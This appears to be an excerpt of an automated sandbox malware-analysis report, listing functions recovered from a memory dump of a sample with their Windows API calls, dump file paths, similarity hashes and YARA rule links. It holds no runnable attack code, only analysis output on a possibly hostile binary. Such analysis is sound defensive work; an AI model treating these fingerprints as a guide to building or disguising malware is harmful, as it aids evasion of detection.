                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007848D1
                                                                                                                                                                                                                                                                              • IsMenu.USER32(?), ref: 007848E6
                                                                                                                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0078492E
                                                                                                                                                                                                                                                                              • DrawMenuBar.USER32 ref: 00784941
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                              • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                              • Opcode ID: c89a6f652184d47fb74d31b75921655dc78fd9ea5f1ef556aa45646b4fe620be
                                                                                                                                                                                                                                                                              • Instruction ID: 4198bbf5744bb752f1c1cbd24fbaa8b1a55330367e90f5c9392af9ec1ce4c094
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c89a6f652184d47fb74d31b75921655dc78fd9ea5f1ef556aa45646b4fe620be
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D417C75A0020AEFDB20EF51D884EAABBB9FF15324F048129F945A7250C778ED55CF60
                                                                                                                                                                                                                                                                              Function 0075272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007527B3
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007527C6
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 007527F6
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                              • Opcode ID: 5e2ace2d18d097adf5565cab1009f3b288e284066ffa0b35ddb2c25e4151cc38
                                                                                                                                                                                                                                                                              • Instruction ID: 69673e045bf9e10394202556701e739ff7a145d2e1b72d465310775c9754187a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e2ace2d18d097adf5565cab1009f3b288e284066ffa0b35ddb2c25e4151cc38
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E2126B2940108BFDB14ABA4C84ACFE77B9DF46360F108129F911931E1CBBD5D4A9660
                                                                                                                                                                                                                                                                              Function 007839B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00783A29
                                                                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00783A30
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00783A45
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00783A4D
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                              • String ID: SysAnimate32
                                                                                                                                                                                                                                                                              • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                              • Opcode ID: 21594165b3460107db1e5e5bfd42fda2d6a56042b25b7d103898ac616a326bba
                                                                                                                                                                                                                                                                              • Instruction ID: 15e10cd6f433576bec14a087335cb442e3f5ed351713e3e817b2d7e680dfac4c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21594165b3460107db1e5e5bfd42fda2d6a56042b25b7d103898ac616a326bba
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC21DE71240209AFEF10AFA8DC84FBB37A9EB44B68F109219FA90D20D0C379DD419761
                                                                                                                                                                                                                                                                              Function 007150DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0071508E,?,?,0071502E,?,007B98D8,0000000C,00715185,?,00000002), ref: 007150FD
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00715110
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0071508E,?,?,0071502E,?,007B98D8,0000000C,00715185,?,00000002,00000000), ref: 00715133
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                              • Opcode ID: f7a2771db1e36f44fa6d94ad9468293548d43916800763976f7d6fafb09a4e28
                                                                                                                                                                                                                                                                              • Instruction ID: e35869f6bb53a5cdeae4d23a3763833a09e1fec665cbece2010428c37f8b1355
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7a2771db1e36f44fa6d94ad9468293548d43916800763976f7d6fafb09a4e28
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50F04F31A4020DFBDB259F98DC49BEDBBB6EF44762F504064F805A21A0DB789E90DB94
                                                                                                                                                                                                                                                                              Function 0074E778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 0074E785
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0074E797
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0074E7BD
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                              • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                              • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                                                              • Opcode ID: c999acee95d6f7b31123db772df50be800bb4f15e9aa26105d218a08c2ef18ee
                                                                                                                                                                                                                                                                              • Instruction ID: d346b1c31fff255b946bec0cd1b72f52f1b716a68117a449d424b235273b4882
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c999acee95d6f7b31123db772df50be800bb4f15e9aa26105d218a08c2ef18ee
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2E02B70C02520DBD77257204C8CFA933297F20B30F224668F841E2090DB3CCC44C759
                                                                                                                                                                                                                                                                              Function 006F663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,006F668B,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F664A
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006F665C
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,006F668B,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F666E
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                              • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                              • Opcode ID: 3462f1332fb3eb8453724189a1e8dbf3a621e5567bcb40dcd64108948eb6d32d
                                                                                                                                                                                                                                                                              • Instruction ID: a19e5d9622a0e9543d9d0199dd03e470699372aebb9113ee39ad50b1cb35b94f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3462f1332fb3eb8453724189a1e8dbf3a621e5567bcb40dcd64108948eb6d32d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01E0CD35A415262792312726FC0CBBE672B9F82F22B164115FD00D2380DF58CC0183F9
                                                                                                                                                                                                                                                                              Function 006F6607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00735657,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F6610
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006F6622
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00735657,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F6635
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                              • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                              • Opcode ID: c5d7297944e9ab7c582ccfb8853b10440d01ac805d28692630f34548c344476f
                                                                                                                                                                                                                                                                              • Instruction ID: 2e0355c1b52c14512e2796a8b30124ac507480f0e4f0667aefa5173313dd6a9d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5d7297944e9ab7c582ccfb8853b10440d01ac805d28692630f34548c344476f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02D01235A529396742322726BC1EADE6B179F96F213564415F900E2394CF68CD0187AD
                                                                                                                                                                                                                                                                              Function 00763306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007635C4
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00763646
                                                                                                                                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0076365C
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0076366D
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0076367F
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                              • Opcode ID: 431608f2f5564dc181ef7b7300de84e593ae48ac2d200c2bba7529968e52ba48
                                                                                                                                                                                                                                                                              • Instruction ID: 47c9b09af40287bfe20aaff61d27520a536abe19f0040b8173c58c7a49b90937
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 431608f2f5564dc181ef7b7300de84e593ae48ac2d200c2bba7529968e52ba48
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1B15071900119ABDF11DBA4CC85EDEB77DEF48350F1040AAFA0AA7151EA789F45CF61
                                                                                                                                                                                                                                                                              Function 0077ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0077AE87
                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0077AE95
                                                                                                                                                                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0077AEC8
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0077B09D
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                              • Opcode ID: feb5220a042a4ff6ea91e968ba42170884eec800c2cf73329b0f2c8f6ddbd200
                                                                                                                                                                                                                                                                              • Instruction ID: 67d61ffa9069e5bfea0ab1582deae364cb3416b418d5f6d4f77d45b6923a8321
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: feb5220a042a4ff6ea91e968ba42170884eec800c2cf73329b0f2c8f6ddbd200
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4A1BE71A04301AFE720DF24C886F2AB7E2AF84754F54885DF5999B2D2CBB5EC40CB95
                                                                                                                                                                                                                                                                              Function 0077C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C10E,?,?), ref: 0077D415
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D451
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4C8
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4FE
                                                                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C505
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0077C560
                                                                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0077C5C3
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 0077C606
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0077C613
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 826366716-0
                                                                                                                                                                                                                                                                              • Opcode ID: b336bb27a6c2adc00133edf37995881b571ea02e7bd188e6dfee3011a34c5f5d
                                                                                                                                                                                                                                                                              • Instruction ID: 55e5eff293c44a28508334eb7edda46f17599a7731c10247721600cb2f85c49d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b336bb27a6c2adc00133edf37995881b571ea02e7bd188e6dfee3011a34c5f5d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B161B271108245AFDB15DF14C490E2ABBE5FF88348F64C59CF0998B292DB35ED45CB92
                                                                                                                                                                                                                                                                              Function 0075ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0075E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0075D7CD,?), ref: 0075E714
                                                                                                                                                                                                                                                                                • Part of subcall function 0075E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0075D7CD,?), ref: 0075E72D
                                                                                                                                                                                                                                                                                • Part of subcall function 0075EAB0: GetFileAttributesW.KERNEL32(?,0075D840), ref: 0075EAB1
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0075ED8A
                                                                                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0075EDC3
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075EF02
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075EF1A
                                                                                                                                                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0075EF67
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                              • Opcode ID: 21e156a3248c93a9a0098a61cd1eb693a7eca9b96b5118f253008663b7abf858
                                                                                                                                                                                                                                                                              • Instruction ID: 87e5b10396df05eb0a2b637b20ec367094cb4948c1999be808db97b1ecc53589
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21e156a3248c93a9a0098a61cd1eb693a7eca9b96b5118f253008663b7abf858
